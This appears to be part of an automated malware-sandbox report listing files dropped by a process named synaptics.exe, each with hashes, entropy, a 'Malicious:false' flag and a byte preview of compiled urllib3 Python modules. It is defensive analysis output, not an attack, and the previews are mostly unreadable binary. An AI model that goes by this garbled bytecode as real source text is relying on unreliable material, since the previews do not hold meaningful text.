                                                                                                                                                                                                            SHA-512:37B8516784A984B2828A687C1CFAA6EA4A201CB5FF511D9BACD93DA6395E00AF642E71F475FC51A8EF57BAC313B4775C0FD707B58985BE229E6AB2EB98BA80F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sh...U.d.Z.e.r.d.d.l.m.Z.m.Z...e.e.e.e.f...d.f...Z.n.e.Z.e.e.d.<.e.e.d.<.e.e.d.<.e.e.d.<.d...Z.Z.d...Z.Z.d.S.).F.....)...Tuple..Union...version..__version__..__version_tuple__..version_tuplez.2.2.3)......r.........N)...TYPE_CHECKING..typingr....r......int..strZ.VERSION_TUPLE..object..__annotations__r....r....r....r......r....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\_version.py..<module>....s..........................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24022
                                                                                                                                                                                                            Entropy (8bit):5.5409125009937705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:m3ovv1iEkiRj91RsJ0YTnenrRaBVIT7sgTbzXugzTBDERk4VypKsFVc56AnzeuqG:m3odrjRsJ0YTG6I8gniiJqYpn6QesG
                                                                                                                                                                                                            MD5:516A891CE11345DDA1EC4FF8412F1EB7
                                                                                                                                                                                                            SHA1:40E38F69F1DEB61093663ED4F0EBAAE592EC8DA8
                                                                                                                                                                                                            SHA-256:9E5F8138FF4FC3624BEF359AE148F53F35180534BCB2C0C6BD863468E80FB1F6
                                                                                                                                                                                                            SHA-512:C5CD8218FC3028864443D795B6ED24911C27F35F70104FF201BA58F3EEABA1875D3AADAE1F5B3965509C43546C019F628081E14E8034E04506AA4956B7FE1667
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gT........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r[d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..z.d.d.l)Z)e)j*Z+W.n...e,e-f.y.......d.Z)G.d.d...d.e...Z+Y.n.w.d.d.l/m0Z0..d.d.l/m1Z1..d.d.l/m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?m@Z@..d.d.lAmBZB..d.d.l.mCZD..d.d.l.mEZEmFZFmGZGmHZHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZN..eOZOePZPe..QeR..ZSd.d.d ..ZTe..Ud!d"d...ZVe..Wd#..ZXeYe.d$..ZZG.d%d&..d&e...Z.G.d'd(..d(e...Z[G.d)d*..d*e.j\..Z]d+d,..d_dFdG..Z^.+d`dadNdO..Z_dbdTdU..Z`dcdVdW..ZaG.dXdY..dY..Zbe)..s[ebZ[e[Zc..ddded]d^..Zdd.S.)f.....)...annotationsN)...HTTPConnection)...HTTPException)...ResponseNotReady....timeout.........HTTPResponse)..._TYPE_PEER_CERT_RET_DICT)...SSLTransport)...HTTPHeaderDict)...probe)...assert_header_parsing)..._DEFAULT_TIMEOUT.._TYPE_TIME
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):29210
                                                                                                                                                                                                            Entropy (8bit):5.440536557009661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:/i2lO3Jti2pYtq6fBiKrzYIpKneR4TliLX1XkFCDD2rz8vIkwjYHklf8HvpnykHN:KdQ22tqUBi9eOTlfavNyke9aR
                                                                                                                                                                                                            MD5:FA80C2AD10A3B865E9099164602CB9D3
                                                                                                                                                                                                            SHA1:ED515BF16F2CADD94CE21832CBB0C45777718D8E
                                                                                                                                                                                                            SHA-256:55CFC76BADE010FABA12328C0A8D3DC6C2C6767E6FDD798E325C57C725152317
                                                                                                                                                                                                            SHA-512:C3E6F8F58CB4F8E1AFEB7112A5F149E53908F64C6C30C665F4D75D755C45AA90D48A867F80CD4ACF174CA13F3C53D949E0A9DDA074D1E3DBA55ABA9FBC3CB24A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sV...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<..d.d.l=m>Z>m?Z?..d.d.l=m@ZA..d.d.l=mBZB..d.d.lCmDZD..e.jEr.d.d.lFZFd.d.lGmHZH..d.d.l.mIZImJZJ..e..KeL..ZMe.jNe<eOe;d.f...ZPG.d.d...d...ZQe.jRe.jSh.ZTG.d.d...d.eQe...ZUG.d.d...d.eU..ZVd6d$d%..ZWe.jXd7d*d+....Z@e.jXd8d,d+....Z@d9d-d+..Z@..d:d;d1d2..ZYd<d4d5..ZZd.S.)=.....)...annotationsN....timeout)...TracebackType.....)..._TYPE_BODY)...HTTPHeaderDict)...RequestMethods)...BaseSSLError..BrokenPipeError..DummyConnection..HTTPConnection..HTTPException..HTTPSConnection..ProxyConfig.._wrap_proxy_error)...port_by_scheme)...ClosedPoolError..EmptyPoolError..FullPoolError..HostChangedError..InsecureRequestWarning..Location
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13233
                                                                                                                                                                                                            Entropy (8bit):4.956155799762973
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:tNid2MCSNJR3aibXrLh86mCrEl7mRkUfLL2xEZiru/cc8fditjgsShRaE:tEdfCSNJR3aibXrLh86frElCRvTCuUrj
                                                                                                                                                                                                            MD5:9102615399B3EE285CBB779CCEA3F39B
                                                                                                                                                                                                            SHA1:B489795F6E894CE1D1766491E4A7D6A167617DD5
                                                                                                                                                                                                            SHA-256:716D244E343B339A5854C77B7B4B016FADE3D36BC9C6D360A781C3083913F9E4
                                                                                                                                                                                                            SHA-512:611866818181BD220656DC7BFA9CE71A506D4BAF08654E008973EA9A8CB41C4BF6C940CEA6E33C630DEE650A9A39E57AAD67D83BEEB22ADD5BEEF953D57F165B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.$.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.r9d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.j.e.j.d.e.f...e.j.e.d.f...f...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z e Z!G.d.d...d.e...Z"G.d.d...d.e...Z#G.d.d ..d e...Z$G.d!d"..d"e...Z%G.d#d$..d$e%e...Z&G.d%d&..d&e%..Z'G.d'd(..d(e'e...Z(G.d)d*..d*e(..Z)G.d+d,..d,e...Z*G.d-d...d.e...Z+G.d/d0..d0e...Z,G.d1d2..d2e-e...Z.G.d3d4..d4e...Z/G.d5d6..d6e...Z0G.d7d8..d8e...Z1G.d9d:..d:e...Z2G.d;d<..d<e2..Z3G.d=d>..d>e2..Z4G.d?d@..d@e2..Z5G.dAdB..dBe2..Z6G.dCdD..dDe...Z7G.dEdF..dFe e-..Z8G.dGdH..dHe...Z9G.dIdJ..dJe.e...Z.G.dKdL..dLe.e...Z:G.dMdN..dNe...Z;G.dOdP..dPe<e0..Z=G.dQdR..dRe-..Z>G.dSdT..dTe...Z?G.dUdV..dVe...Z@d.S.)W.....)...annotationsN)...MessageDefect)...IncompleteRead.....)...HTTPConnection)...ConnectionPool)...HTTPResponse)...Retryc....................@........e.Z.d.Z.d.Z.d.S.)...HT
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9715
                                                                                                                                                                                                            Entropy (8bit):5.406254129187549
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:XIk2H+iSdmq+qOqLpEzqkUS47qJKqtPAK/qPdqqBSqqP:4k2H+iSIq+qOqLOzqA47qJKqtPAK/qP2
                                                                                                                                                                                                            MD5:767E3E00687A11F30A2DE33A1298E448
                                                                                                                                                                                                            SHA1:1576343BFBE58ACEFAA5456E6E175B452C3CC4B2
                                                                                                                                                                                                            SHA-256:6A952DC9C0CFC593CB47EACB17F7A5EB5A4C39D8A3A163CEEEDA0DC5E8246CE7
                                                                                                                                                                                                            SHA-512:EF147B9345C871C826107047728FF93DA640DE8D78E4C13BD413AABE0B65A3F5774E3F4268F7A71AA1D7E976B5119342DCCA450D700A06E9D09AA90B23277338
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g[*.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.e.f...Z.e.j.e.e.j.e.e.f...e.j.e.e.e.f...f...Z...d.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.G.d.d...d...Z.d.S.)......)...annotationsN..application/octet-stream..filename..str | None..default..str..returnc....................C...s....|.r.t...|...d...p.|.S.|.S.).z.. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. r....)...mimetypes..guess_type).r....r......r.....KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\fields.py..guess_content_type....s..........r......name..value.._TYPE_FIELD_VALUEc........................s....d.d.l.}.|.j.d.t.d.d.....t...t...r.....d.....t...f.d.d...d.D.....s=|...d.....d...}.z.|...d.....W.|.S...t.t.f.y<......Y.n.w.t.j.....d.....|...d...........S.).a..... Helper function t
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2345
                                                                                                                                                                                                            Entropy (8bit):5.59428364922348
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:oL1hfLSa7XUyrfcuCKwlb9BEA2GS8FD5yHbVz:SLSaDxc59TEA2CDUHbx
                                                                                                                                                                                                            MD5:3132DE852CA2F3D1039DAA63A3C1F2F8
                                                                                                                                                                                                            SHA1:A426A94A53BCB644F5B1F28C209BD7B117E07E94
                                                                                                                                                                                                            SHA-256:6A457F1F57D7D1E3B4930F3EF477736D9A820BC3D564B9C6DE5FE3FA5B60F466
                                                                                                                                                                                                            SHA-512:F7761A3B8F285FA1E796308E333673A349709EDC2A9130C44D4B032C5424551A04E27D92BB7E73C951254D9F5F939A5365120053BFBDAF1406C50B49F1154439
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g[........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...d...d...Z.e.j.e.j.e.j.e.e.f...e.f.....Z.e.j.e.e.j.e.e.f...f...Z.d.d.d...Z.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...BytesIO.....)..._TYPE_FIELD_VALUE_TUPLE..RequestFieldz.utf-8.......return..strc....................C...s....t...t...d.........S.).zN. Our embarrassingly-simple replacement for mimetools.choose_boundary.. .....)...binascii..hexlify..os..urandom..decode..r....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\filepost.py..choose_boundary....s......r......fields.._TYPE_FIELDS..typing.Iterable[RequestField]c....................c...sH.....t.|.t.j...r.|.....}.n.|.}.|.D.].}.t.|.t...r.|.V...q.t.j.|...V...q.d.S.).z.. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... N)...isinstance..typing..Mapping..itemsr....Z.from_tuples).r......iterable.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18201
                                                                                                                                                                                                            Entropy (8bit):5.491440687419283
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:HlCIl5+Qqvw7bm2+Pp0hTZp4tGwi5k43Y:HvgQqvwng+NZp8Of3Y
                                                                                                                                                                                                            MD5:57D85919D0CD4D22E2E1FA4BA7F03525
                                                                                                                                                                                                            SHA1:042FE05CC47D143265496A17206E21E3DA1BA7A2
                                                                                                                                                                                                            SHA-256:6A1B7D3893EA8F7424BF23C6F39E6393A8CD02D4C743E3A7DA058B2684C46542
                                                                                                                                                                                                            SHA-512:29D45786CF38E8DD30CAEF84998BAA140B658A28B3777ECE5CF195954CD7023668D81D23907325BD1E416A6E10CC18F21DC1043386DD6B9DD4D98A2F11A3CA79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.Y.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..e.j'r.d.d.l(Z(d.d.l)m*Z*..g.d...Z+e..,e-..Z.d.Z/d.Z0G.d.d...d.e.j1..Z2d)d.d...Z3e..4e3e2..e..4e3e2..d...Z5e.e.d...Z6G.d.d ..d e...Z7G.d!d"..d"e7..Z8d*d'd(..Z9d.S.)+.....)...annotationsN)...TracebackType)...urljoin.....)...HTTPHeaderDict..RecentlyUsedContainer)...RequestMethods)...ProxyConfig)...HTTPConnectionPool..HTTPSConnectionPool..port_by_scheme)...LocationValueError..MaxRetryError..ProxySchemeUnknown..URLSchemeUnknown)...BaseHTTPResponse)..._TYPE_SOCKET_OPTIONS)...connection_requires_http_tunnel)...Retry)...Timeout)...Url..parse_url)...Self)...PoolManager..ProxyManager..proxy_from_url)...key_file..cert_file..cert_reqs..ca_certs..ca_cert_data..ssl_version..ssl_minimum_version..ssl_maximum_version..ca_cert_dir..ss
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33463
                                                                                                                                                                                                            Entropy (8bit):5.334996153883082
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7uBkshRIwAG560Mg+c3lKBgtd1xaZ38CSYJr/YV4CypM0AmwK2Kd1B+E1dz6RPrX:9Gc8L1KBaPxbupCIAHK2KZiy8wUhX
                                                                                                                                                                                                            MD5:5D8BDA24798CD7DA2C19BB63618B2E07
                                                                                                                                                                                                            SHA1:A16BC40F63F9C842E96CBBCBD7C85E4DDF2AFF19
                                                                                                                                                                                                            SHA-256:97D25A797653BB1BD59C7F8EFCEBB6E44D1320B97F6876C8F52130A5AFD24C5D
                                                                                                                                                                                                            SHA-512:73B036602746F7E1C3B366A2A7C995E095CFCF417EC1B8AF9A84195A4F0BA894C666120C267D34B9F14DEEBC8E8071220A5963F0FA6313067DC8FB37B4CC9B4A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.rKd.d.l.m.Z...z.z.d.d.l.Z.W.n...e.y_......d.d.l.Z.Y.n.w.W.n...e.yl......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.e.e.f.y.......d.Z Y.n.w.e!e"e#e..$d.e.j%...&......Z'e'd.k.r.d.Z n.d.Z d.d.l(m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d.l-m.Z.m/Z/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@..e.j.r.d.d.lAmBZB..e..CeD..ZEG.d.d...d...ZFG.d.d...d.eF..ZGG.d.d...d...ZHG.d.d...d.eF..ZIe.d.u...r.G.d.d...d.eF..ZJe ..r.G.d.d ..d eF..ZKG.d!d"..d"eF..ZLd.d&d'..ZMG.d(d)..d)..ZNG.d*d+..d+e.jO..ZPG.d,d-..d-eP..Z.d.S.)/.....)...annotationsN)...contextmanager)...HTTPMessage)...HTTPResponse)...timeout.....)...BaseHTTPConnectionFz.^([0-9]+)\.([0-9]+)).r.........T)...util)..._TYPE_BODY)...HTTPHeaderDict)...BaseSSLError..HTTPConnection..HTTPException)...BodyNotHttplibCompatible..DecodeError..HTTPError..IncompleteRead..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                            Entropy (8bit):4.664349640552226
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/TTlllluleh/wZWewo5jDt+kiE2J5dj/a6iVWrzOXH+IOkcTgp:y/f/qeh/wv5jDwkn23h/a/Ar6XeR4
                                                                                                                                                                                                            MD5:98863F6B314A58FC7C2282217EF72B97
                                                                                                                                                                                                            SHA1:FF03FB5D1590F9E270283BEF8F9B135C5F8489BD
                                                                                                                                                                                                            SHA-256:0A14F9E4E6FB8E558DCE0A9CAC35DCA2B45A7EF27D3457B77BDC9438F219EE13
                                                                                                                                                                                                            SHA-512:989B9A48B80CC0DD03CF4EFD984ED7A69D622296B1EEFDB92BA87F9724ADE1A4EE66E7457F41C6F8CF6B51BB18A39559FAD672BE7226CEADBBB72FD14B3B62BC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.S.).N..r....r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\contrib\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6139
                                                                                                                                                                                                            Entropy (8bit):5.638888116290871
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:wq8bFojUEqiHSz83KWZMs7hTbWiTmC69iE245Zi81JQ3:L6VEqtVGbC9ipca3
                                                                                                                                                                                                            MD5:85E66EC9639F82905F9923AAC1E7EE69
                                                                                                                                                                                                            SHA1:3C770A8FCA23E67B2B144ACA9E2648CAF4FA77BC
                                                                                                                                                                                                            SHA-256:E21BD4489ECECB8F0D8CA3261F82A5FB13093CBE4DA71E2788290B4A4DFCFB90
                                                                                                                                                                                                            SHA-512:ACF0E91B0FFE15FAA0C6E2FC7E89384847EE2F3B11186867B435FE35997EDC2F387D0248F9CB3FBB71F6417682BBF077BD054D7647EE10D2AD39645FAF405BB2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g}........................@...s6...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yf......d.Z.Y.n.w.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recom
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1415
                                                                                                                                                                                                            Entropy (8bit):5.4055190096671994
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:4hMu6QKYYYH7N9QU4DMU3KZsGfM3yRiR7FmfGW92vbwFWHrb49msQWP7:1BdYLbX4DinRaauD9Hrb4mAP7
                                                                                                                                                                                                            MD5:F0A4547068FCACE9FEB787FB45B0D13C
                                                                                                                                                                                                            SHA1:F201DA54896C6C4CA9E25F5C41998CCC1613252A
                                                                                                                                                                                                            SHA-256:C815CF6C6DD2B6A3E071D058635C034ADD05558CCE890AD49BC01803A2729F28
                                                                                                                                                                                                            SHA-512:2FD80E31F7E5C4082252154AD600D996307E829CDDD0908A41BC54241F8BD8D2561F0E081E3837EFEEE29DA45F7591B32D95E334AB8B8EAC7315B64144D4A100
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sN...U.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.l.Z.d.a.d.e.d.<.d.d.d...Z.d.d.d...Z.d.S.)......)...annotations)...version..inject_into_urllib3..extract_from_urllib3Nz.typing.Any..orig_HTTPSConnection..return..Nonec....................C...s....t.d...}.|...d...s.t.d.|...d.......d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...|.j.a.|.|._.|.|._.d.g.|._.d.g.|._.d.S.).N..h2z.4.zQurllib3 v2 supports h2 version 4.x.x, currently the 'h2' module is compiled with z5. See: https://github.com/urllib3/urllib3/issues/3290.........connection....util....HTTPSConnectionPool....ssl_.....)...HTTP2Connection).r......startswith..ImportError..r....r......connectionpoolr....r....r......HTTPSConnectionr......ConnectionCls..ALPN_PROTOCOLS).Z.h2_version..urllib3_connection..urllib3_utilr......urllib3_util_sslr......r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\http2\__init__.pyr........s".....................................c.............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2549
                                                                                                                                                                                                            Entropy (8bit):5.264022857723652
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:jPQG3rPSnqRTB08DGmDZrZCYawGQ2bcwf27jpWsI663cv6iuJh6+:jzz/DGmDZEYaw4bbujpXkSNok+
                                                                                                                                                                                                            MD5:E0D201BD6516E44F0BB85412DE263EA6
                                                                                                                                                                                                            SHA1:B35DA26F5F693FF6B87092DF2C023B8967C8AA33
                                                                                                                                                                                                            SHA-256:E08AFF66FFA2E8370932F20B84FB9FFDABE3504D1C9AE3D1039D1B4A7528D1BE
                                                                                                                                                                                                            SHA-512:70E1D98DEB7E57532383521A9A847B073FAC955F027802F161F1661A02211CEAE3908E57B22D6C55C8E0DDAE27BE3DBDB035625F6861DD14FE7D3C3F4F024CAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sL...d.d.l.m.Z...d.d.l.Z.G.d.d...d...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.g.Z.d.S.)......)...annotationsNc....................@...sB...e.Z.d.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)..._HTTP2ProbeCache...._lock.._cache_locks.._cache_values..return..Nonec....................C...s....t.....|._.i.|._.i.|._.d.S...N)...threading..Lockr....r....r........self..r.....PC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\http2\probe.py..__init__....s..........z._HTTP2ProbeCache.__init__..host..str..port..int..bool | Nonec....................C...s....d.}.|.j..7..|.|.f.}.z.|.j.|...}.|.d.u.r.|.W.W...d.........S.W.n...t.y4......t.....|.j.|.<.d.|.j.|.<.Y.n.w.W.d.........n.1.s?w.......Y...|.j.|...}.|.......z.|.j.|...}.W.|.S...t.ym..}...z.t.|.t...rdJ...|.........d.}.~.w.w.r....).r....r......KeyErrorr......RLockr......acquire..BaseException..isinstance..release).r....r....r......value..key..key_lock..er....r....r......acquire_and_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):958
                                                                                                                                                                                                            Entropy (8bit):5.344910343532263
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:gXJUVegJzYoyYhRYQZyihmLptrv2buqq9PXwfGL:gX3gJz2Y39Zyi0TrOaqq9Pkw
                                                                                                                                                                                                            MD5:53E421134BF9D717204316C71D1ACD8D
                                                                                                                                                                                                            SHA1:0ABF8040355B570DCA6FD5F5AE7F795D93FA3C9E
                                                                                                                                                                                                            SHA-256:7D72E743BA59125B693C9384160C3B4CA7C27309C8A8323B1DAB6A41CA550CE9
                                                                                                                                                                                                            SHA-512:05EB1BA363B8D969C0DFBA4004F6818CC607876ACCDAD3B37C56ED62A403689C7BA445EB92076D67945F15DAAD271E3F3D929DB5E4F8DAB0CF92D03D22CD400D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.S.)......)...annotations.....)...is_connection_dropped)...SKIP_HEADER..SKIPPABLE_HEADERS..make_headers)...is_fp_closed)...Retry)...ALPN_PROTOCOLS..IS_PYOPENSSL..SSLContext..assert_fingerprint..create_urllib3_context..resolve_cert_reqs..resolve_ssl_version..ssl_wrap_socket)...Timeout)...Url..parse_url)...wait_for_read..wait_for_write).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...__future__r......connectionr......requestr....r....r......responser......retryr....Z.ssl_r....r....r....r....r....r....r....r......timeoutr......urlr....r......waitr....r......__all__..r ...r ....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\__init__.py..<module>....s..............(.........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3477
                                                                                                                                                                                                            Entropy (8bit):5.5498788301320054
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Ad8QkXnGzo+RA+j7JArpwwSRGR7UAm0DEWStUV5yrIeoYPqr+rb8WTUVHwZJP9+:ckXh+m+hAVwwStdndm5YXiub8WT3ZJI
                                                                                                                                                                                                            MD5:AD072C46DADBF1BD33A67C91B1B01094
                                                                                                                                                                                                            SHA1:73D89317D4CACAD84C972FB51BE015F1C01A5919
